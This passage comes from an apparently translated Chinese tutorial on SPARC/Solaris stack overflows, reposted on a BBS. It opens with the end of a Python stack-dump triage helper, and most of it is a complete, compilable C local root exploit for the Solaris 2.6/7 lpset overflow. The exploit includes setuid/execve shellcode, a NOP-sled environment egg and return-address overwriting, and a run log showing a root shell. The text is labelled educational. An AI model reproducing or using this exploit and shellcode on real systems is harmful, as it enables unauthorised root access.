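0xffbef6f0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbef700: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbef710: 0x41412220 0x3e2f6465 0x762f6e75 0x6c6c2032
"""

# Frame layout from section 1.2: locals at %sp, ins at %sp+32, then a 4-word reserved area.
LOCALS = [f"%l{i}" for i in range(8)]
INS = ["%i0", "%i1", "%i2", "%i3", "%i4", "%i5", "%fp", "%i7"]
RESERVED = 4 * 4


def parse_words(dump):
    """Map each 32-bit word in the dump to its address."""
    words = {}
    for line in dump.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        base = int(m.group(1), 16)
        for i, tok in enumerate(m.group(2).split()):
            words[base + 4 * i] = int(tok, 16)
    return words


def decode_window(words, sp):
    """Read back the register window spilled at %sp (%l0-%l7) and %sp+32 (%i0-%i7)."""
    regs = {name: words[sp + 4 * i] for i, name in enumerate(LOCALS)}
    regs.update({name: words[sp + 32 + 4 * i] for i, name in enumerate(INS)})
    return regs


def is_fill_pattern(word):
    """True when all four bytes are one repeated printable byte, e.g. 0x41414141 from 'AAAA'."""
    b = word.to_bytes(4, "big")  # SPARC is big-endian
    return len(set(b)) == 1 and 0x20 <= b[0] < 0x7F


def triage(words, sp):
    """Summarise what restore will load into the caller's window and where its ret will go."""
    regs = decode_window(words, sp)
    clobbered = [n for n in LOCALS + INS if is_fill_pattern(regs[n])]
    return {
        "saved_fp": regs["%fp"],
        "return_address": (regs["%i7"] + 8) & 0xFFFFFFFF,  # ret = jmpl %i7+8
        "clobbered": clobbered,
        "window_fully_overwritten": len(clobbered) == len(LOCALS) + len(INS),
    }


def buffer_size(frame_sp, string_start):
    """The article's bufsize derivation: distance to the saved window minus the reserved area."""
    return (frame_sp - string_start) - RESERVED


if __name__ == "__main__":
    w = parse_words(SAMPLE_DUMP)
    print(triage(w, 0xFFBEF6D0))                 # all 16 saved registers hold 0x41414141
    print(buffer_size(0xFFBEF6D0, 0xFFBEF310))   # 944, as computed in the text
```

A frame whose saved %i7 decodes to a fill pattern is the signature of the two-return hijack described in section 2.1, so the report is a quick first check on any SPARC core with a bus error in ret/restore.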
With the analysis above, we can now write the test program:
-----------------------------------------------------------------------------------------
/* ---> lpset_sparc.c <---
 * lpset exploit for Solaris 2.6/7 Sparc .
 *
 * It is one test for writing exploits on Sparc, just for EDUCATIONAL purpose. :)
 * tested in Solaris 2.6/7 /sparc.
 * Usages:
 *     ./lpset_sparc <align> <offset> <bufsize>
 * in most cases, bufsize is fixed, offset=1500 is OK .
 * If it doesn't work, you just need to adjust the align value from 0 to 3.
 * by warning3@hotmail.com
 * y2k/5/5
 */
#include <stdio.h>
#include <stdlib.h>      /* malloc(), atoi(), exit() */
#include <string.h>      /* memset(), memcpy(), strlen() */
#include <unistd.h>      /* execle() */

#define BUFSIZE 944             /* the size of overflowed buffer */
#define EGGSIZE 1024            /* the egg buffer size */
#define NOP 0xaa1d4015          /* "xor %l5, %l5, %l5" */
#define ALIGN 1                 /* If it doesn't work, try adjusting align to 0,1,2,3 */
#define OFFSET 1500
#define PRINTER "blah"

char shellcode[] =              /* from scz's funny shellcode for SPARC */
"\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08"      /* setuid(0) */
"\x20\x80\x49\x73\x20\x80\x62\x61\x20\x80\x73\x65\x20\x80\x3a\x29"
"\x7f\xff\xff\xff\x94\x1a\x80\x0a\x90\x03\xe0\x34\x92\x0b\x80\x0e"
"\x9c\x03\xa0\x08\xd0\x23\xbf\xf8\xc0\x23\xbf\xfc\xc0\x2a\x20\x07"
"\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
"\x91\xd0\x20\x08\x2f\x62\x69\x6e\x2f\x73\x68\xff";

/* get current stack pointer address to guess the return address;
   %i0 becomes the caller's %o0 (the return value) after restore */
long get_esp(void)
{
    __asm__("mov %sp,%i0");
}

int main( int argc, char **argv )
{
    char *pattern, eggbuf[EGGSIZE + 1], *env[2];   /* +1: room for a terminating NUL */
    long retaddr, i;
    long bufsize=BUFSIZE, offset=OFFSET, align=ALIGN, patternsize;
    long *addrptr;

    if( argc > 1 ) align = atoi(argv[1]);
    if( argc > 2 ) offset = atoi(argv[2]);
    if( argc > 3 ) bufsize = atoi(argv[3]);

    retaddr = get_esp() + offset;           /* Guess return address */

    printf("Usages: %s <align> <offset> <bufsize> \n\n", argv[0] );
    printf("Using RET address = 0x%lx ,Bufsize = %ld, Offset = %ld, Align= %ld\n",
           retaddr, bufsize, offset, align );

    /* bufsize + reserved area + saved in/local + NULL */
    patternsize = bufsize + 4*4 + 16*4 + 1;
    if((pattern = (char *)malloc(patternsize)) == NULL) {
        printf("Can't get enough memory!\n");
        exit(-1);
    }
    memset(pattern, 'C', patternsize );     /* fill pattern buffer with garbage */
    pattern[patternsize - 1] = '\0';        /* the NULL the comment above reserves room for */
    memset(pattern+20, 0x3d, 1);            /* put '=' into buf */

    addrptr = (long *) (pattern + bufsize + 4*4 );  /* move to saved %l0 */
    /* Let's overwrite caller function's saved stack frame */
    for( i = 0 ; i < 16 ; i ++ )
        *addrptr++ = retaddr;               /* saved (%l0-%l7),(%i0-%i7) */

    /* construct shellcode buffer */
    memset(eggbuf,'A',EGGSIZE);             /* fill the eggbuf with garbage */
    for (i = align; i + 3 < EGGSIZE; i += 4)     /* fill with NOP, never past the end */
    {
        eggbuf[i+3]=NOP & 0xff;
        eggbuf[i+2]=(NOP >> 8 ) &0xff;
        eggbuf[i+1]=(NOP >> 16 ) &0xff;
        eggbuf[i+0]=(NOP >> 24 ) &0xff;     /* Big endian */
    }
    /* Notice : we assume the length of shellcode can be divided exactly by 4.
       If not, exploit will fail. Anyway, our shellcode is. ;-) */
    memcpy(eggbuf + EGGSIZE - strlen(shellcode) - 4 + align, shellcode,
           strlen(shellcode));
    memcpy(eggbuf,"EGG=",4);                /* Now : EGG=NOP...NOPSHELLCODE */
    eggbuf[EGGSIZE] = '\0';                 /* terminate the environment string */
    env[0] = eggbuf;                        /* put eggbuf in env */
    env[1] = NULL;                          /* end of env */

    /* adjust pattern size by printer length */
    execle("/usr/bin/lpset", "lpset", "-n", "fns",
           "-a", (pattern + strlen(PRINTER) - 4 ), PRINTER, NULL, env);
    return 1;                               /* only reached if execle() fails */
} /* end of main */
-----------------------------------------------------------------------------------------
[warning3@sun1 test]$ gcc -o lp_ex lpset_sparc.c
[warning3@sun1 test]$ ./lp_ex
Usages: ./lp_ex <align> <offset> <bufsize>
Using RET address = 0xffbefcb4 ,Bufsize = 944, Offset = 1500, Align= 1
# id
uid=0(root) gid=1(other)                <--- success!
#
From the examples above, I think readers will have found that writing overflow exploits under Solaris is not especially difficult. Once the mechanism of function calls is understood, and the peculiarities of the SPARC architecture (for example, alignment) are kept in mind, it should be quite easy to write your own.

All rights reserved. Reproduction without permission is prohibited.
Visit our site: http://www.isbase.com/
绿色兵团 (Green Army), your guarantee of security

--
☆ Source: ·BBS 荔园晨风站 bbs.szu.edu.cn·[FROM: bbs@192.168.28.106]
--
※ Reposted: ·BBS 荔园晨风站 bbs.szu.edu.cn·[FROM: bbs.szptt.net.cn]